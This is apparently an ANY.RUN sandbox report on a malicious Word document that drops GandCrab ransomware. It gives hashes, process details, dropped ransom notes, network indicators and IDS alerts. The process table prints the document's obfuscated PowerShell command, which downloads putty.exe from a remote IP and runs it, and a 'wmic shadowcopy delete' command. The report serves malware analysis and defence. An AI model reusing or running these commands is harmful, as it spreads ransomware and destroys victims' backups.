analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Emergеnсyеxitmар.doc

Full analysis: https://app.any.run/tasks/c68fcb5a-56a4-4be0-95d4-d430a7c253a0
Verdict: Malicious activity
Threats:

GandCrab is probably one of the most famous Ransomware. A Ransomware is a malware that asks the victim to pay money in order to restore access to encrypted files. If the user does not cooperate the files are forever lost.

Analysis date: January 23, 2019, 08:08:54
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
loader
ransomware
gandcrab
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: admin, Template: Normal.dotm, Last Saved By: Admin, Revision Number: 4, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Tue Jan 22 18:58:00 2019, Last Saved Time/Date: Tue Jan 22 18:59:00 2019, Number of Pages: 1, Number of Words: 9, Number of Characters: 57, Security: 0
MD5:

2D25220BFD3BC6CABF1CA27D5F41A362

SHA1:

A0812FDAF898AAC0184C7FA08F7F11BAE29C3750

SHA256:

6D20FCE7FF12863EE648EFF76A6E77E67BD78FB93FD137456CEB134DE4B30BE1

SSDEEP:

384:JtBYFiSAoKXMVkZ02s3pLcHYt68jkHI1oSY7Y2W0dSVSrvFigztPASt0jjlmSrqR:jMVk2HpMJ8kHSY7YgdSVSrvgQd

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2964)
    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 2964)
    • Downloads executable files from IP

      • powershell.exe (PID: 3948)
    • Application was dropped or rewritten from another process

      • putty.exe (PID: 3256)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3948)
    • GandCrab keys found

      • putty.exe (PID: 3256)
    • Actions looks like stealing of personal data

      • putty.exe (PID: 3256)
    • Writes file to Word startup folder

      • putty.exe (PID: 3256)
    • Deletes shadow copies

      • putty.exe (PID: 3256)
    • Renames files like Ransomware

      • putty.exe (PID: 3256)
    • Changes settings of System certificates

      • putty.exe (PID: 3256)
    • Dropped file may contain instructions of ransomware

      • putty.exe (PID: 3256)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3948)
      • putty.exe (PID: 3256)
    • Creates files in the Windows directory

      • powershell.exe (PID: 3948)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3948)
    • Creates files in the program directory

      • putty.exe (PID: 3256)
    • Reads the cookies of Mozilla Firefox

      • putty.exe (PID: 3256)
    • Creates files like Ransomware instruction

      • putty.exe (PID: 3256)
    • Adds / modifies Windows certificates

      • putty.exe (PID: 3256)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2964)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2964)
    • Dropped object may contain TOR URL's

      • putty.exe (PID: 3256)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: admin
Keywords: -
Template: Normal.dotm
LastModifiedBy: Admin
RevisionNumber: 4
Software: Microsoft Office Word
TotalEditTime: 1.0 minutes
CreateDate: 2019:01:22 18:58:00
ModifyDate: 2019:01:22 18:59:00
Pages: 1
Words: 9
Characters: 57
Security: None
CodePage: Windows Cyrillic
Company: Salve
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 65
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Название
  • 1
CompObjUserTypeLen: 32
CompObjUserType: ???????? Microsoft Word 97-2003
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
5
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs powershell.exe #GANDCRAB putty.exe wmic.exe vssvc.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2964"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Emergеnсyеxitmар.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3948powershell $AbR41ULTo = '65532.804050533$xJw0xyfhi = 65532.804050533n65532.804050533e65532.804050533w65532.804050533-obj65532.804050533e65532.804050533c65532.804050533t n65532.804050533e65532.804050533t65532.804050533.w65532.804050533e65532.804050533b65532.804050533cli65532.804050533ent; $xJw0xyfhi.d65532.804050533o65532.804050533w65532.804050533n65532.804050533l65532.804050533o65532.804050533a65532.804050533d65532.804050533f65532.804050533i65532.804050533le(\"65532.804050533h65532.804050533t65532.804050533t65532.804050533p65532.804050533://205.185.117.187/olalala/putty.exe\", \"c:\win65532.804050533dows\t65532.804050533emp\put65532.804050533t65532.804050533y65532.804050533.65532.804050533e65532.804050533x65532.804050533e\"); 65532.804050533s65532.804050533tar65532.804050533t-p65532.804050533r65532.804050533o65532.804050533ces65532.804050533s \"c:\win65532.804050533d65532.804050533o65532.804050533ws\temp\p65532.804050533u65532.804050533t65532.804050533t65532.804050533y.ex65532.804050533e\";'.replace('65532.804050533', $OPQJjrhbU);$uDzjkYGah = '';iex($AbR41ULTo);C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3256"C:\windows\temp\putty.exe" C:\windows\temp\putty.exe
powershell.exe
User:
admin
Company:
Nullsoft, Inc.
Integrity Level:
MEDIUM
Description:
Audience Need Zimmerman
Version:
3.1.22.6
3104"C:\Windows\system32\wbem\wmic.exe" shadowcopy deleteC:\Windows\system32\wbem\wmic.exe
putty.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
WMI Commandline Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3248C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exeservices.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Microsoft® Volume Shadow Copy Service
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 532
Read events
1 021
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
427
Text files
320
Unknown types
16

Dropped files

PID
Process
Filename
Type
2964WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVREA64.tmp.cvr
MD5:
SHA256:
3948powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SVAQ3MCXXMHK4O1TQ5D3.temp
MD5:
SHA256:
3256putty.exeC:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\boot.sdi
MD5:
SHA256:
3256putty.exeC:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\Winre.wim
MD5:
SHA256:
3256putty.exeC:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\Winre.wim.wfpnwtgw
MD5:
SHA256:
3948powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
2964WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:633EDCAF70A08EA4C8F9489679EF5BF4
SHA256:446A4274C3E9935A40A0EA6332996E3ABECA0B7D59EB8A541F56397F29158E6E
3256putty.exeC:\$Recycle.Bin\S-1-5-21-1302019708-1500728564-335382590-500\WFPNWTGW-DECRYPT.txttext
MD5:FE747A5E31BE420CF1211EE1CAD10730
SHA256:2A7C25BAC5E5F054EBCEB6E9E8BB71606E3AEF4DAD4F282F4820CB138E2D219C
3256putty.exeC:\PerfLogs\WFPNWTGW-DECRYPT.txttext
MD5:FE747A5E31BE420CF1211EE1CAD10730
SHA256:2A7C25BAC5E5F054EBCEB6E9E8BB71606E3AEF4DAD4F282F4820CB138E2D219C
3948powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20f3ab.TMPbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
3
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3948
powershell.exe
GET
200
205.185.117.187:80
http://205.185.117.187/olalala/putty.exe
US
executable
641 Kb
suspicious
3256
putty.exe
GET
301
138.201.162.99:80
http://www.kakaocorp.link/
DE
html
162 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3256
putty.exe
138.201.162.99:443
www.kakaocorp.link
Hetzner Online GmbH
DE
malicious
3256
putty.exe
138.201.162.99:80
www.kakaocorp.link
Hetzner Online GmbH
DE
malicious
3948
powershell.exe
205.185.117.187:80
FranTech Solutions
US
suspicious

DNS requests

Domain
IP
Reputation
www.kakaocorp.link
  • 138.201.162.99
malicious

Threats

PID
Process
Class
Message
3948
powershell.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
3948
powershell.exe
Potentially Bad Traffic
ET INFO Possibly Suspicious Request for Putty.exe from Non-Standard Download Location
3948
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3948
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3948
powershell.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
No debug info